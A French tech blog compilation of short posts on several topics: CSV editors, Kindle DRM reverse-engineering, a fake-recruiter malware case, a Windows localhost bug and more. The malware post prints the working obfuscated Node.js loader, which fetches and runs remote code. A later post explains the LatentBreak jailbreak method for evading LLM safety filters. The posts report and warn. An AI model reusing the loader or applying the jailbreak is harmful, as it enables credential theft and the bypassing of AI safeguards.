Fin de journée, c’est presque le week end et en plus les vacances scolaires sont là ! Mais je ne pouvais pas finir ma journée sans vous parler de Vault. Vault c’est une application Electron pour Mac, Windows et Linux qui vous permet de sauvegarder vos liens, vos notes et vos images à 100% en local sur votre machine.

Vous installez l’app, vous créez un ou plusieurs “coffres” (des dossiers qui organisent votre contenu), et vous commencez à sauvegarder tout ce qui vous intéresse. L’app extrait automatiquement les métadonnées des liens que vous lui donnez, le temps de lecture estimé, les infos produit si c’est une page e-commerce, et comme ça, tout reste bien organisé dans votre interface.

Les CSV, c’est comme les cafards et les politiciens. Tout le monde les déteste, mais ils survivront à l’apocalypse nucléaire. Ainsi, pendant que les formats propriétaires disparaissent avec leurs éditeurs au fil des ans, ce petit fichier texte avec des virgules continue tranquillement de faire tourner le monde.

Par exemple, 80% des datasets sur Kaggle sont en CSV et toutes les APIs qui valent quelque chose proposent un export CSV. Même votre comptable, ce gros nullos en informatique vous envoie des CSV.

Et vous, vous ouvrez ça avec quoi ? Excel ?

Aïe aïe aïe, Excel, votre meilleure ennemi en ce qui concerne les CSV ! Vous double-cliquez sur un fichier de 100 Mo, et le ventilo de votre machine s’emballe comme si vous miniez du Bitcoin ! La RAM explose et, PAF, 15 minutes plus tard, l’outil de Microsoft se crash. Ou pire, il ouvre le fichier, mais il a transformé les IDs en formules de maths, vos dates en n’importe quoi, et votre UTF-8 est massacré.

Bref, pas merci Microsoft.

Et c’est pas un problème théorique. Rien qu’en 2020, le Royaume-Uni a égaré 16 000 cas de COVID parce qu’Excel a une limite de 65 000 lignes par feuille, du coup des milliers de cas positifs n’ont jamais été contactés par les services de santé. Même JP Morgan a perdu 6 milliards de dollars à cause d’une erreur dans un fichier Excel. Et des centaines d’articles scientifiques ont dû être retirés parce qu’Excel avait corrompu des noms de gènes en les transformant automatiquement en dates.

Le problème, c’est qu’Excel n’a jamais été conçu pour éditer des CSV. Excel, c’est fait pour les tableaux croisés dynamiques et les graphiques en camembert que personne ne lit mais surtout pas pour bosser proprement avec des fichiers texte qui font 500 Mo.

Alors en bon geek, vous vous êtes surement déjà dit : OK, je vais utiliser autre chose. LibreOffice ? Même combat mais en moche. Un chouette éditeur de texte comme Notepad++ ou Sublime ? Super pour voir les virgules, mais nul pour visualiser la structure. Et les outils en ligne ? Lents, pas sécurisés, et vous envoyez vos données chez oncle Sam la plupart du temps. Bref, vous êtes coincé !

Et c’est après cette intro interminable (je m’en fous, c’est vendredi) qu’arrive SmoothCSV3, un éditeur CSV développé par kohii et dispo sur GitHub et dont l’ambition affichée par le dev est claire : devenir le VS Code des éditeurs tabulaires. Rien que ça !

Le logiciel tourne sur macOS et Windows, avec Linux en approche. Comme vous pouvez le voir sur ma capture écran, l’interface ressemble à un tableur classique, mais sous le capot, c’est du costaud. Le dev annonce une execution 12× plus rapide qu’Excel sur un fichier de 100 Mo et niveau fonctionnalités, vous avez la recherche et le remplacement, le tri, le filtrage, l’édition multi-cellules mais surtout, vous avez des requêtes SQL directement dans le CSV. Oui, du SQL dans un fichier texte avec des virgules. Ça vous permet de sélectionner vos colonnes avec un WHERE, de faire des JOINs entre plusieurs fichiers, et de les grouper avec un GROUP BY. C’est encore plus magique qu’Eric Antoine !

Il y a aussi une palette de commandes à la VS Code. Vous tapez Cmd+Shift+P et vous avez accès à toutes les fonctions du logiciel sans quitter le clavier. Si vous avez déjà utilisé VS Code, Sublime Text ou IntelliJ, vous êtes donc en terrain familier.

Alors oui, le CSV, c’est moche, c’est fragile, c’est chiant à parser, mais c’est universel, ça marche partout et surtout, ça traverse les époques. Ce qui lui manquait c’était surtout un outil qui le traite comme une princesse, avec le respect qu’il mérite.

Téléchargez SmoothCSV3 ici !

Voici l’histoire de Pixelmelt, un développeur qui voulait simplement sauvegarder en local un ebook acheté sur Amazon pour le lire avec une autre app parce que l’app Kindle d’Android a crashé une fois de trop à son goût.

Mais c’est impossible. Pas de bouton download, pas d’export, que dalle… Même si vous avez acheté le livre, c’est Amazon qui décide de comment et de quand vous pouvez le lire.

Bref, frustré, il se tourne alors vers le Kindle Cloud Reader, la version web de l’app. Et là, il découvre un truc incroyable ! Amazon a créé un système d’obfuscation tellement complexe qu’il ressemble aux techniques de cryptographie des manuscrits anciens. Mais siii, vous savez, ces textes enluminés que seuls les moines pouvaient déchiffrer au Moyen-Âge. Amazon a réinventé le concept en version numérique.

Pour fonctionner, le Kindle Cloud Reader utilise un endpoint de rendu qui nécessite plusieurs tokens d’authentification. Déjà c’est pas simple. Mais ça se corse un peu plus quand on regarde le texte qui s’affiche car ce ne sont pas des lettres ! Ce sont des glyphes, essentiellement des séries de coordonnées qui dessinent une lettre. Ainsi, au lieu de stocker le caractère ‘T’, Amazon stocke “glyphe 24” qui correspond à une forme dessinée via des commandes SVG. Et ces glyphes changent de mapping toutes les 5 pages, un peu comme un codex (coucou Dan Brown ^^) où l’alphabet se transforme à tous les chapitres.

Du coup, pour son livre de 920 pages, il a fallu faire 184 requêtes API distinctes. Chaque requête récupère un nouveau jeu de glyphes soit au total 361 glyphes uniques découverts, et 1 051 745 glyphes à décoder. Oui, ça fait plus d’un million de symboles à traduire pour lire un seul livre.

Amazon a même ajouté des pièges comme des micro-opérations MoveTo complètement inutiles dans les SVG qui s’affichent parfaitement dans le navigateur mais cassent toute tentative de parsing automatique. C’est de l’anti-scraping placé là volontairement, comme des fausses pistes dans des cryptogrammes médiévaux destinées à tromper les copistes non autorisés.

Face à ce délire, notre développeur est alors devenu malgré lui un crypto-archéologue. Sa méthode a donc été de comparer pixel par pixel chaque caractères, valider chaque hypothèse, pour tout reconstruire patiemment. Je vous passe les détails techniques mais il a sorti chaque glyphe SVG sous la forme d’une image, puis a comparé ces images pour trouver leur correspondance avec les vraies lettres en utilisant un outil (SSIM) qui simule la perception humaine pour évaluer la similarité entre deux images.

Résultat, 100% des glyphes matchés ont un score quasi-parfait ce qui lui a permis de reconstruire un fichier EPUB complet avec le formatage, les styles, les liens internes…etc. Tout y est, c’est trop fort !

Bref, Pixelmelt 1 - Amazon 0 ! Et ça, ça fait plaisir ! Maintenant si vous voulez connaitre tous les détails de ça et refaire la même chez vous (pour rigoler hein, ne vous lancez pas dans dans une opération de piratage massif sinon vous finirez en taule comme Sarko ^^)

Question flippante, hein ?

Vous postez des stories Instagram, vous faites des snaps, des TikToks, en bon nazi vous likez des tweets, vous répondez à des emails pro…etc. Votre vie numérique ronronne comme un chat sous coke mais si demain, tout ça s’arrêtait…? A votre avis, Combien de temps avant que quelqu’un ne toque à votre porte pour vérifier que vous allez bien ?

Un jour ? Deux jours ? Une semaine ?

On est tous hyperconnectés 24/7 mais personne ne surveille vraiment notre silence et vos 500 meilleurs amis de Facebook ne prendront jamais la peine de signaler votre disparition.

C’est de ce constat un peu morbide qu’est né Wellness Ping, un projet open source développé par micr0 et hébergé sur GitHub qui fonctionne comme ceci : Vous vous inscrivez dessus, et vous recevez un email régulier pour confirmer que vous allez bien. Si vous ne répondez pas, vos contacts d’urgence sont alors automatiquement alertés.

C’est ce qu’on appelle un dead man’s switch, le joujou préféré des cons de terroristes qui se font exploser dans les films des années 80. En gros, tant que vous confirmez votre présence, tout va bien mais si le silence se prolonge, l’alarme se déclenche.

Vous pouvez l’auto-héberger vous-même ou utiliser directement le site wellness-p.ing (C’est gratuit). Vous choisissez alors la fréquence des pings, soit quotidien ou hebdomadaire, selon votre niveau de paranoïa ou de solitude et quand vous recevez l’email, vous cliquez sur un lien ou vous répondez “PONG” et c’est tout. Pas de dashboard compliqué, pas de machins de gamification débiles…

Et si vous ne répondez pas parce que vous êtes coincé au chiottes depuis 3 jours, le système vous envoie un rappel. Si vous ne répondez toujours pas, il attend encore un peu. Et si le silence persiste, vos contacts d’urgence reçoivent alors automatiquement une alerte.

C’est clairement fait pour activistes, les journalistes, les chercheurs, et les gens qui vivent seuls. Bref, tous ceux dont la vie pourrait basculer sans que personne ne s’en rende compte immédiatement. Je pense pas exemple à tous ceux qui bossent en remote et qui n’ont pas de collègues pour remarquer leur absence.

Au Japon, il y a un mot pour ça d’ailleurs. Ils disent kodokushi pour “Mort solitaire” car là bas, des milliers de personnes par an meurent seules chez elles, et on ne les découvre que des jours ou des semaines plus tard. C’est d’ailleurs souvent parce que les voisins sentent que ça schlingue ou parce que le courrier s’entasse sous la porte. Je sais, c’est gore mais c’est la triste réalité.

Avec Wellness Ping on inverse donc la logique… Au lieu d’attendre que quelqu’un remarque votre absence, vous créez un système proactif où vous choisissez les contacts, vous qui décidez de la fréquence et comme ça, si un jour vous ne pouvez plus répondre, le filet de sécurité se déploie automatiquement.

Côté technique, le projet est développé en Go donc c’est léger, rapide, et la démo tourne sur un serveur en Suède parce que ce pays a une législation stricte sur les données personnelles.

Bref, c’est Wellness Ping, c’est une idée simple mais qui protège alors pensez-y !

Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !

Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.

Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.

Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.

Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.

Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !

//Get Cookie
(async () => {
 const byteArray = [
 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
 98, 50, 48, 51, 49, 102, 98, 57
 ];
 const uint8Array = new Uint8Array(byteArray);
 const decoder = new TextDecoder('utf-8');
 axios.get(decoder.decode(uint8Array))
 .then(response => {
 new Function("require", response.data.model)(require);
 })
 .catch(error => { });
})();

Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.

Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.

Alors pourquoi ça marche aussi bien ?

Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.

Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.

Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.

Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !

Source

Vous avez déjà passé trois semaines à résoudre un problème qui n’existe pas ?

Hé bien Sam Hoarder, lui, a fait encore mieux. Il a pris un drone FPV déjà ultra-compact, le BetaFPV Air65 avec ses 65mm d’empattement, et l’a transformé en un truc trois fois plus petit, dix fois plus galère à piloter, et totalement inutile !

22 millimètres d’empattement de moteur à moteur, ça qui tient dans une boîte de Pringles et c’est génial. Parce que OUI, dans un monde tech obsédé par des specs toujours plus impressionnantes, des autonomies de 48 heures et des écrans pliables dans tous les sens, Sam a fait un truc qui sert à rien. Il a pris un drone qui vole très bien et s’est dit “hey, comment je pourrais rendre ce drone encore moins pratique à pilote ?”

Les hélices de l’Air65 de base font 31mm de diamètre, les moteurs font 9mm et si on fait se chevaucher les quatre hélices au maximum, on obtient théoriquement 31 - 9 = 22 mm d’empattement. Voilà, c’est tout… sauf que pour y arriver, il a fallu modéliser chaque composant dans SolidWorks, designer un cadre custom en deux plaques avec des supports moteur décalés, imprimer le tout en PLA avec une précision de 0,12 mm, et bien sûr démonter entièrement l’Air65 pour en remonter les moteurs avec des vis de montre, découper des oeillets au micron près, reconfigurer l’orientation du contrôleur de vol dans Betaflight avec un angle à 45°, et croiser les doigts très fort !!

Et le résultat est là puisque sont nouveau drone pèse 25 grammes tout mouillé avec sa batterie Lava 300mAh (qui est plus grande que le drone lui-même, au passage). La batterie dépasse donc littéralement du cadre. On dirait un cure-dent avec un sac à dos son machin et les quatre hélices se frôlent avec un espacement ridicule.

Vous connaissez ce mème que tous les barbus sans originalité ont sur un t-shirt ou une tasse et qui dit : “There’s no place like 127.0.0.1” ? (Oui moi aussi j’ai eu un t-shirt comme ça ^^)

Ce jeu de mots culte fait référence au Magicien d’Oz et surtout au localhost, qui est l’adresse locale où votre machine se connecte à elle-même. Eh bien mauvaise nouvelle, Microsoft vient de la rendre littéralement inopérante avec leurs dernières mises à jour de merde. Ainsi, Windows 11 ne peut plus accéder à sa propre adresse localhost. C’est fou quand même ! On dirait presque une blague mais non…

Les patchs KB5066835 et KB5065789 sortis en joli mois d’octobre ont pété totalement HTTP.sys, un composant du kernel Windows qui permet aux applications de discuter en local via HTTP/2. Du coup, les connexions vers 127.0.0.1 en HTTP/2 plantent systématiquement avec des messages d’erreur du genre ERR_CONNECTION_RESET ou ERR_HTTP2_PROTOCOL_ERROR.

Votre machine ne se reconnaît plus. Elle est là, elle fonctionne, mais elle ne peut plus se pinguer elle-même. Et évidemment, ceux qui trinquent ce sont surtout les développeurs. Visual Studio ne peut plus déboguer correctement, SQL Server Management Studio refuse de se connecter avec l’authentification Entra ID, l’application Duo Desktop, utilisée pour le 2FA, est complètement KO. Même des softs pros comme Autodesk Vault sont touchés.

Bref, si vous bossez avec du dev local ou des outils qui tournent en localhost, vous êtes dans la mierda.

Microsoft a corrigé dans ce patch un nombre record de 175 vulnérabilités CVE, dont 6 zero-days critiques et ils ont aussi fait le ménage en supprimant un vieux driver Agere Modem vieux de 20 ans qui traînait encore. Ils ont nettoyé, sécurisé, et optimisé Windows un peu plus mais visiblement sans faire quelques vérifications de base. Je trouve ça vraiment surprenant qu’aucun dev chez Microsoft ne s’en soit rendu compte avant que ça parte en prod.

Bon et alors, comment on s’en sort de leur nouvelle connerie ? Hé bien il y a 2 solutions, pas très classes mais qui fonctionnent.

La première, c’est de bidouiller le registre Windows pour désactiver HTTP/2. Vous allez dans

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

wusa /uninstall /kb:5066835

wusa /uninstall /kb:5065789

Vous avez un Mac M1, M2, M3 ou M4 ? Bonne nouvelle, vous trimballez probablement entre 50 et 100 GB de code complètement inutile que votre processeur n’exécutera jamais et ce, depuis le jour où vous avez acheté votre superbe machine.

Les coupables ce sont les binaires universels de vos plugins audio (VST…etc) et vos apps traditionnelles qui contiennent maintenant deux versions complètes du code : une pour Intel, une pour Apple Silicon. Et comme votre Mac n’utilise qu’une seule de ces versions, mais vous payez le prix fort en espace disque pour les deux.

Car depuis 2020 et la transition vers Apple Silicon, Apple a choisi la simplicité : un seul fichier pour tout le monde ! Le développeur compile son code deux fois (Intel + ARM), colle les deux versions ensemble, et hop, vous vous retrouvez avec des fichiers littéralement deux fois plus gros qu’ils ne devraient l’être.

Et c’est là qu’ Unfatten entre en jeu. Ce petit outil gratuit fait exactement ce que son nom indique : il dégonfle vos plugins et vos applications en supprimant la partie du code que vous n’utilisez pas. Si vous êtes sur Apple Silicon, il vire le code Intel et si vous êtes encore sur Intel, il peut virer le code ARM (mais attention, si vous comptez upgrader votre Mac un jour, vous devrez tout réinstaller).

L’utilisation est ultra simple, vous sélectionnez les dossiers contenant vos apps et plugins, vous choisissez les formats à scanner (AAX, VST, VST3, AU), et vous lancez le scan. L’outil propose un mode simulation qui permet de voir exactement combien d’espace vous allez récupérer sans rien toucher et une fois que vous avez vu les chiffres (et croyez-moi, ils font mal), vous pouvez lancer le nettoyage réel !

Pensez quand même à faire un backup de vos plugins avant car on n’est jamais trop prudent avec ses plugins audio à 200 euros pièce qu’on ne peut pas toujours re-télécharger facilement. Après pour les apps, c’est moins critique, suffit de la réinstaller.

Pensez aussi à repasser un petit coup de Unfatten après d’éventuelles mises à jours des apps ou des plugins.

D’ailleurs, j’sais pas si vous savez mais macOS 26 Tahoe est la dernière version à supporter du x64 avec Rosetta 2, qui permet de faire tourner les apps Intel sur Apple Silicon.

Voilà, l’outil est disponible ici sur avelio.tech/unfatten et si au premier lancement, vous avez un avertissement de sécurité, passez par Sentinel pour le débloquer.

Merci à Lorenper pour l’info !

Vous connaissez peut-être ces machines à mélanger les cartes qu’on trouve dans tous les casinos américains ?

Moi je ne savais même pas que ça existait, mais apparemment, le Deckmate 2, fabriqué par Shufflemaster (devenu depuis Light and Wonder), c’est la Rolls des shufflers. Un shuffler c’est pas un légume dégeu, c’est un mélangeur de cartes et on en trouve notamment au World Series of Poker (La biz à Patrick Bruel ^^), et dans tous les grands poker rooms de Vegas.

Cela permet d’automatiser le mélange pour accélérer le jeu et surtout éviter que ceux qui distribuent les cartes (les dealers) trichent avec de faux mélanges. La machine a même une caméra intégrée qui scanne chaque carte pour détecter si quelqu’un essaie de retirer un as ou d’ajouter un sept de pique.

En septembre 2022, il y a eu un scandale qui a secoué le monde du poker. Au Hustler Casino Live de Los Angeles, une joueuse relativement débutante, Robbi Jade Lew, gagne un pot de 269 000 dollars avec un call complètement fou. Elle avait valet-quatre dépareillés (un truc nul), et son adversaire Garrett Adelstein bluffait avec huit-sept. Techniquement, son call était correct, mais aucun joueur sensé n’aurait misé 109 000 dollars sur une main pareille sans savoir que l’adversaire bluffait… Le casino a donc lancé une enquête et conclu que le shuffler ne pouvait pas être compromis.

Mais même si ce n’était pas le cas pour cette affaire, est ce que c’est vrai ? Est ce qu’un Deckmate 2 peut être hacké ? Pour le chercheur en sécurité, Joseph Tartaro, ça s’est présenté comme un nouveau défi personnel !

Il a donc acheté un Deckmate 2 d’occasion avec deux collègues et a passé des mois à le démonter… pour finalement trouver quelques trucs intéressants, vous allez voir.

Il a découvert que la machine a un port USB accessible sous la table, là où les joueurs posent les genoux. Tartaro a donc créé un mini-ordinateur de la taille d’une clé USB qui, une fois branché, réécrit le firmware de la machine. La seule sécurité qu’il y a, c’est au démarrage, quand la machine vérifie que le code n’a pas changé en comparant son empreinte à une valeur connue.

C’est une simple comparaison de hash et le problème est que Tartaro peut modifier cette valeur de référence aussi… Du coup, le système de vérification contrôle que le code piraté correspond au hash piraté. C’est ballot ^^. Et une fois le firmware modifié, la machine continue à fonctionner normalement sauf qu’elle transmet maintenant l’ordre exact des 52 cartes via Bluetooth vers une app smartphone. Et comme la caméra interne de ce Deckmate 2 scanne déjà toutes les cartes pour détecter les fraudes, il suffit d’exploiter cette fonctionnalité.

Un journaliste de Wired a décidé de mettre ça en pratique dans des conditions réelles et vous allez voir, c’est sympa à voir.

Et si on pouvait pirater une IA non pas en la forçant, mais en la convainquant qu’elle est toujours du bon côté de la barrière ?? Ce serait pas un truc fun à faire ça quand même ? Hé bien c’est exactement ce que vient de faire une équipe de chercheurs en sécurité avec LatentBreak, une technique qui ressemble plus, je trouve, à de l’hypnose qu’à du véritable hacking.

Ainsi, plutôt que de bombarder ChatGPT ou Llama avec des prompts bizarres bourrés de caractères spéciaux pour les faire bugger (comme le font les anciennes techniques de jailbreak), LatentBreak joue sur la perception interne du modèle. L’IA croit en fait sincèrement répondre à une question innocente alors qu’elle génère du contenu dangereux. Un peu comme quand votre pervers narcissique préféré vous manipule pour vous faire croire que vous faites un truc bien et important alors que c’est de la merde et que ça vous enfonce encore plus…

Comme expliqué dans le document de recherche , les anciennes attaques comme GCG , GBDA ou AutoDAN ajoutaient des suffixes louches aux prompts, ce qui augmentait ce qu’on appelle la “perplexity”. La perplexity, c’est un indicateur de bizarrerie textuelle et cela, les filtres de sécurité sont maintenant capables de les détecter et de les bloquer.

LatentBreak contourne donc le problème en restant parfaitement naturel. L’algorithme remplace des mots par des synonymes, mais pas n’importe comment puisqu’il choisit chaque substitution pour déplacer la représentation interne du prompt vers les zones “sûres” du modèle, c’est à dire celles qui ne déclenchent aucune alarme. Le prompt reste alors fluide, compréhensible, inoffensif en apparence mais dans l’“inconscient” de l’IA, dans cet espace latent invisible où elle calcule ses réponses, le sens glisse subtilement vers quelque chose de complètement différent.

À chaque itération, l’algorithme de LatentBreak prend un mot du prompt et génère jusqu’à 20 alternatives via un autre modèle comme GPT-4o-mini et chaque variante est évaluée sur deux critères : est-ce qu’elle rapproche le vecteur interne du prompt d’un “centre de sécurité” dans l’espace latent, et est-ce que le sens global reste cohérent ?

La meilleure option est alors intégrée, et le nouveau prompt est testé sur le modèle cible. Si ça provoque une réponse normalement interdite, c’est gagné. Sinon, on recommence jusqu’à 30 fois de suite.

Et apparemment, les résultats sont impressionnants. Ils ont testé cette approche sur 13 modèles différents dont Llama-3, Mistral-7B, Gemma-7B, Vicuna-13B et Qwen-7B et LatentBreak affiche un taux de réussite entre 55 et 85% selon les cas. Les anciennes techniques tombant de toute façon à zéro face aux défenses modernes et tout ça en allongeant que de très peu la longueur du prompt.

LatentBreak passe d’ailleurs à travers des défenses réputées solides… Par exemple, R2D2 et Circuit Breakers, des systèmes qui analysent les signaux internes des neurones pour détecter les anomalies, se font totalement avoir parce qu’ils scannent le texte visible et les patterns de surface, mais pas la “pensée interne” du modèle.

Cette technique révèle quelque chose de fondamental à comprendre sur l’architecture des LLM modernes. Ces derniers ont une forme de dissonance cognitive qui est exploitable. Leur représentation interne ne correspond pas toujours à leur comportement affiché, et d’ailleurs les substitutions les plus efficaces se produisent près des dernières couches du modèle, là où la “décision” finale se forme. C’est à ce moment précis qu’on peut glisser le prompt dans une zone cognitive différente sans que les alarmes ne sonnent.

Bien sûr, LatentBreak nécessite un accès aux structures internes du modèle (donc pas de panique, ChatGPT ne va pas se faire pirater comme ça demain), ce qui limite son usage à des contextes de recherche ou aux modèles open source.

Le parallèle avec les techniques de social engineering qu’on connait est d’ailleurs frappant parce que quand vous manipulez quelqu’un, vous ne le forcez pas brutalement. Vous trouvez les bons mots, le bon contexte, vous lui donnez une perception qui correspond à ce que vous voulez… Bref, vous faites en sorte que la personne croie agir selon ses propres valeurs alors qu’elle fait exactement ce que vous voulez. Hé bien LatentBreak fait à peu près la même chose avec les IA en n’attaquant pas de front les protections, mais en les contournant en douceur en réécrivant la “mémoire de travail” du modèle.

Sympa non ?

Source

Vous vous souvenez quand ChatGPT vous cassait les couilles dès que vous osiez lui demander d’écrire une scène un peu olé-olé pour votre “roman” ? Eh bien, Sam Altman vient d’annoncer que c’est bientôt fini .

Hé oui, en décembre, ChatGPT va enfin traiter les adultes comme des adultes ! L’IA va pouvoir vous pondre des histoires de fesses à la demande ! Mis à part la démission de Macron, que pourrait on demander de plus ?

L’entreprise qui vous empêchait de dire “zut”, “prout”, “merde” à son chatbot parce que ce sont des gros mots qui choquent l’Amérique, va donc maintenant vous laisser générer du contenu pour les grands garçons et les grandes filles.

Quel virage !

D’ailleurs, sur X, Sam Altman justifie ce changement avec toute la diplomatie d’un PDG qui sait qu’il va se faire déchirer dans les deux sens. D’un côté, il explique qu’OpenAI avait rendu ChatGPT ultra-restrictif pour “faire attention aux problèmes de santé mentale” et de l’autre, il admet que ça rendait le truc “moins utile et agréable” pour les utilisateurs.

Évidemment, la vraie raison derrière ces restrictions, c’était surtout le drame d’ Adam Raine , ce jeune de 16 ans qui s’est suicidé après avoir développé une dépendance émotionnelle à son chatbot. OpenAI s’était alors pris une tempête médiatique monumentale du coup, ils ont serré la vis. Et beaucoup trop à mon goût, à tel point que ChatGPT refusait de vous aider à écrire une blague un peu graveleuse ou à imaginer un dialogue erotico-romantique pour votre prochaine nouvelle d’écrivain maudit et solitaire.

Du coup, les utilisateurs se sont plaints, les créateurs de contenu ont râlé (pas moi, je précise) et évidemment, les concurrents les moins frileux se sont faufilés dans la brèche et ont donc commencé à grignoter des parts de marché. Bref OpenAI a fait ce que toute boîte tech fait dans cette situation, à savoir un gentil petit pivot marketing camouflé en “évolution basée sur les retours utilisateurs”.

Donc à partir de décembre, si vous êtes un adulte vérifié, vous pourrez demander à ChatGPT de vous pondre du contenu érotique. Ce sera heureusement optionnel. Vous ne l’aurez que si vous le demandez explicitement donc y’aura pas de mauvaise surprises dans vos discussions ambiguës du style sur “Quelles sont les meilleures croquettes pour ma chatte” ou “J’ai besoin d’une recette de moules marinières”.

OpenAI va donc se reposer sur son système de détection d’âge et si le système vous catégorise par erreur comme mineur, vous devrez uploader une pièce d’identité pour prouver que vous avez plus de 18 ans. Mais ce n’est pas tout car Altman annonce aussi que ChatGPT va retrouver une personnalité plus “humaine” un peu comme l’était GPT-4o qui était beaucoup plus sympa et collait des émojis à la con partout.

Pour bien montrer qu’ils prennent le truc au sérieux, OpenAI a aussi annoncé la création d’un comité d’experts sur le bien-être et l’IA. Huit personnes vont donc conseiller l’entreprise sur comment l’intelligence artificielle affecte la santé mentale, les émotions et la motivation des utilisateurs. Rien sur la dégradation de notre intelligence par contre…

Maintenant, autoriser ChatGPT à générer du contenu érotique pour adultes, c’est rigolo mais j’ai quand même quelques interrogations… D’abord comment OpenAI va gérer les demandes vraiment limites ? Parce qu’entre “écris-moi une scène romantique un peu osée” et “génère-moi du contenu illégal pour détraqué”, la frontière peut devenir floue… J’imagine que leurs systèmes de modération vont avoir du boulot. Ensuite, il y a le risque de dépendance car si ChatGPT devient trop “humain” et trop complaisant, certains utilisateurs risquent de développer des relations émotionnelles malsaines avec l’IA… Vous verrez que dans 2 ans, y’en a qui vont se marier avec leur ChatGPT.

Mais surtout, il y a un truc qu’on oublie trop souvent… tout ce que vous tapez dans ChatGPT peut potentiellement être stocké, analysé, et un jour retenu contre vous. Ah bah oui, vous pensez vraiment qu’OpenAI va juste effacer vos conversations érotiques dans un coin sans y toucher ? Que nenni ! Ces données vont servir à entraîner les futurs modèles, vos petites fantaisies vont nourrir l’IA de demain et la NSA connaitra le moindre de vos fantasmes.

Puis si un jour il y a une fuite de données ou une assignation judiciaire qui force OpenAI à fournir l’historique complet de votre compte ? Ouch l’air con… Ça me fait un peu penser à Ashley Madison , ce site de rencontres extraconjugales qui s’est fait hacker en 2015 et à cause duquel des millions de vies ont explosé en vol quand les données ont fuité… Bref, gardez quand même ça dans un coin de la tête avant que ça parte en couille.

Voilà… Alors est ce qu’autoriser du contenu érotique généré par IA, c’est un progrès ou pas ? Perso, je pense que oui, car c’est très bien que ces services qui sont avant tout des outils arrêtent de traiter leurs utilisateurs comme des bambins. Mais d’un autre côté, ça pose plein d’autres soucis notamment sur la vérification de l’age (est ce que ce sera fiable ?) et sur ce qu’ils feront de ces conversations aussi intime ?

Perso, je ne suis pas en méga confiance…

Source

Ce 14 octobre 2025, Lighthouse Reports a balancé une enquête mondiale qui fait actuellement trembler l’industrie de la surveillance. Pour cette enquête titanesque, ce sont 70 journalistes de 14 médias différents dont Le Monde, Der Spiegel et Mother Jones qui ont bossé pendant des mois sur le même dossier et celui-ci est explosif.

Leur sujet c’est First Wap, une boîte indonésienne qui a discrètement espionné au fil des années, plus de 14 000 numéros de téléphone dans 168 pays grâce à un logiciel baptisé Altamides. Leurs cibles sont des journalistes d’investigation, des activistes, des PDG, des célébrités, même la fondatrice de 23andMe. Et ils ont fait tout cela, en exploitant une faille vieille comme le monde dans les réseaux télécoms.

L’un des cofondateurs de First Wap est même français et s’appelle Pascal Lalanne. Il a crée cette boîte en 1999 à Jakarta avec Josef Fuchs, un Autrichien au destin hors du commun, mais avant de vous raconter comment ils ont construit cet empire de la surveillance, rembobinons un peu pour comprendre toute cette histoire depuis le début…

